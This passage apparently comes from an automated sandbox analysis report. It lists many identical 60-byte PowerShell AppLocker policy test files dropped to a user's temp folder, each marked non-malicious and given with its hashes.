SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41vcsjng.z2x.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4yw0ceis.zt0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fve3jqg.ses.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5o2m0rdm.ua0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2qvtjmx.ars.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abmxt3bz.ieb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aihrhb42.pfh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avkzzdc3.hle.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgdfw5nz.he0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwwfqeyk.tah.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqub54tr.fg3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmvuxj0a.zhw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epksysko.x2q.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eymsem2u.jjg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb1ni5lq.11u.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0o0igms.clf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2skgyee.zxs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hin1hcnz.n45.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hphxzkcd.ztc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huwf1d5c.pv5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ieqhxlbv.sue.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilkdbt45.xe3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j41jedml.q51.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbfvgb4s.kca.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgxsovo4.0vj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kl0pr1ys.sjo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqljqull.d1h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_llo2chti.xmd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpvk101p.q1b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqrfpqda.mk3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lstqm4je.ygx.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbwhxzk4.iro.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mldts5zg.dnw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
